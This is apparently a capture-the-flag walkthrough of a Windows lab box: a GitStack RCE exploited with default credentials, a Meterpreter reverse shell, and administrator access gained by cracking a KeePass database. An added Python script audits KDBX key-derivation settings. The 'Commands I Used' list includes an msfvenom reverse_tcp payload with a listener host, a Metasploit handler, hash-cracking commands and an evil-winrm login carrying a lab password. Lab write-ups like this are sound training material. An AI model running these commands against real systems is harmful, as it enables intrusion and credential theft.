Premise

In this walk-through, we went over the Windows box named Stack and exploited a GitStack application deployed on the web server. We escalated our privileges by cracking and opening the KeePass password database found on the machine.

Skills Learned

  • GitStack Exploitation
  • Windows Privilege Escalation
  • Decrypting KeePass database files (.kdbx)

Finding the Way In

My first step was to scan the target machine to see what services were running. I found an HTTP server and an SMB server. When I tried to access the web server, I got a “page not found” error, but the debug information gave me some juicy clues, including a few interesting directories: “registration,” “login,” and “gitstack.”

I started by exploring the “login” directory and found a default username and password of “admin/admin”. This was a great start! Next, I checked out the “gitstack” directory and discovered that it was running GitStack version 2.3.10. A quick search for exploits related to this version of GitStack revealed a remote code execution (RCE) vulnerability. This was my ticket in!

Getting a Foothold

I downloaded a Python script that exploited this vulnerability and modified it to include my IP address and the “admin/admin” credentials I had found earlier. I then used the exploit to run a few commands on the target machine, which confirmed that I was running as a user named “john.”

To get a more stable and powerful shell, I used Metasploit's msfvenom to generate a reverse-shell payload. I then set up a simple web server on my machine to host this payload. I modified my exploit script one more time to tell the target machine to download and run my payload. As soon as it did, I got a Meterpreter session, which is a powerful type of shell that gives you a lot of control over the target machine.

Becoming the Admin

Now that I had a shell, my next goal was to become the administrator of the machine. I noticed a KeePass database file in “john’s” documents folder. KeePass is a password manager, so I knew this file probably contained some valuable credentials.

I downloaded the KeePass database file to my machine and used a tool called keepass2john to extract the password hash from it. I then used another tool called John the Ripper to crack the hash. It didn’t take long to find the password: “princess”.

I installed KeePass on my machine and opened the database file using the password I had just found. Inside, I found the credentials for the administrator account! The password was “secure3apass262”.
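The cracking step works because a KDBX master key is derived from the master password by a tunable key-derivation function: the database's KDF settings decide how expensive each offline guess is, and a password that appears in rockyou.txt falls quickly no matter what. As an added example that is not part of this write-up, the following Python script parses the header of a KDBX 3.x or 4.x file (the same header keepass2john reads) and reports the KDF and its work parameters, which is the check to run on your own databases. The two sample headers are constructed inline and belong to no real database; the field IDs, KDF UUIDs and VariantDictionary layout are my reading of the KDBX format from KeePass's own source and are assumptions, not something this page states.

```python
import struct
import uuid

# KeePass 2.x file signature (two little-endian uint32 values)
KDBX_SIG1 = 0x9AA2D903
KDBX_SIG2 = 0xB54BFB67

# Header field IDs shared by KDBX 3.x and 4.x (assumed from KeePass source)
END_OF_HEADER, TRANSFORM_ROUNDS, KDF_PARAMETERS = 0, 6, 11

# KDF identifiers as stored in the KdfParameters "$UUID" entry (KDBX 4)
KDF_NAMES = {
    uuid.UUID("c9d9f39a-628a-4460-bf74-0d08c18a4fea"): "AES-KDF",
    uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c"): "Argon2d",
    uuid.UUID("9e298b19-56db-4773-b23d-fc3ec6f0a1e6"): "Argon2id",
}


def _read_variant_dict(buf):
    """Parse a KDBX 4 VariantDictionary: 2-byte version, then entries of
    [type][int32 name_len][name][int32 value_len][value], ended by a 0x00 byte."""
    pos, out = 2, {}
    while buf[pos] != 0:
        vtype = buf[pos]
        nlen = struct.unpack_from("<i", buf, pos + 1)[0]
        name = buf[pos + 5:pos + 5 + nlen].decode()
        pos += 5 + nlen
        vlen = struct.unpack_from("<i", buf, pos)[0]
        raw = buf[pos + 4:pos + 4 + vlen]
        pos += 4 + vlen
        if vtype == 0x04:            # UInt32
            out[name] = struct.unpack("<I", raw)[0]
        elif vtype == 0x05:          # UInt64
            out[name] = struct.unpack("<Q", raw)[0]
        elif vtype == 0x18:          # String
            out[name] = raw.decode()
        else:                        # bool / int32 / int64 / byte array: keep raw
            out[name] = bytes(raw)
    return out


def inspect_kdbx_header(data):
    """Return the format version and key-derivation settings of a KDBX header."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KeePass 2.x (KDBX) file")
    fields, pos = {}, 12
    while True:
        fid = data[pos]
        # KDBX 3 stores the field length as uint16, KDBX 4 as uint32
        if major >= 4:
            size, hdr = struct.unpack_from("<I", data, pos + 1)[0], 5
        else:
            size, hdr = struct.unpack_from("<H", data, pos + 1)[0], 3
        fields[fid] = data[pos + hdr:pos + hdr + size]
        pos += hdr + size
        if fid == END_OF_HEADER:
            break
    info = {"version": f"{major}.{minor}"}
    if major >= 4:
        kdf = _read_variant_dict(fields[KDF_PARAMETERS])
        info["kdf"] = KDF_NAMES.get(uuid.UUID(bytes=kdf["$UUID"]), "unknown")
        if info["kdf"] == "AES-KDF":
            info["rounds"] = kdf["R"]
        else:                        # Argon2: iterations, memory in bytes, lanes
            info["iterations"] = kdf["I"]
            info["memory_bytes"] = kdf["M"]
            info["parallelism"] = kdf["P"]
    else:                            # KDBX 3 only ever uses AES-KDF
        info["kdf"] = "AES-KDF"
        info["rounds"] = struct.unpack("<Q", fields[TRANSFORM_ROUNDS])[0]
    return info


# --- constructed sample headers (synthetic, not taken from any real database) ---
def _field(fid, payload, major):
    return struct.pack("<BI" if major >= 4 else "<BH", fid, len(payload)) + payload


def _vd_entry(vtype, name, raw):
    return (bytes([vtype]) + struct.pack("<i", len(name)) + name.encode()
            + struct.pack("<i", len(raw)) + raw)


SAMPLE_KDBX3 = (struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)
                + _field(TRANSFORM_ROUNDS, struct.pack("<Q", 6000), 3)
                + _field(END_OF_HEADER, b"\r\n\r\n", 3))

_ARGON2D = uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c")
_KDF4 = (b"\x00\x01"                                  # dictionary version 0x0100
         + _vd_entry(0x42, "$UUID", _ARGON2D.bytes)
         + _vd_entry(0x05, "I", struct.pack("<Q", 2))
         + _vd_entry(0x05, "M", struct.pack("<Q", 64 * 1024 * 1024))
         + _vd_entry(0x04, "P", struct.pack("<I", 2))
         + b"\x00")
SAMPLE_KDBX4 = (struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 0, 4)
                + _field(KDF_PARAMETERS, _KDF4, 4)
                + _field(END_OF_HEADER, b"\r\n\r\n", 4))

if __name__ == "__main__":
    for sample in (SAMPLE_KDBX3, SAMPLE_KDBX4):
        print(inspect_kdbx_header(sample))
```

Run it against a real file with `inspect_kdbx_header(open("db.kdbx", "rb").read())`. A low AES-KDF round count on an old KDBX 3 database, or small Argon2 memory and iteration values, means each guess is cheap; raising them in KeePass's database settings slows a cracker proportionally, but the decisive control is still a master password that is not in any wordlist.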

With the administrator’s password in hand, I used a tool called evil-winrm to log in to the machine as the administrator. I was now in full control of the “Stack” machine! 🚀

Commands I Used

Here are some of the key commands I used during this process:

  • Scanning for services: nmap
  • Searching for exploits: searchsploit
  • Generating a malicious payload: sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.7 LPORT=4545 -f exe -o shell.exe
  • Starting a simple web server: python -m http.server
  • Starting the Metasploit console: msfconsole
  • Using the multi-handler exploit: use exploit/multi/handler
  • Setting the payload: set payload windows/meterpreter/reverse_tcp
  • Downloading a file from the target machine: download "Password Manager.kdbx"
  • Extracting the hash from a KeePass database: keepass2john "Password Manager.kdbx" > hash
  • Cracking the hash with John the Ripper: john --wordlist=/usr/share/wordlists/rockyou.txt hash
  • Logging in as the administrator: evil-winrm -i <IP> -u administrator -p 'secure3apass262'
  • Checking the current user: whoami

Video Walk-through


About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
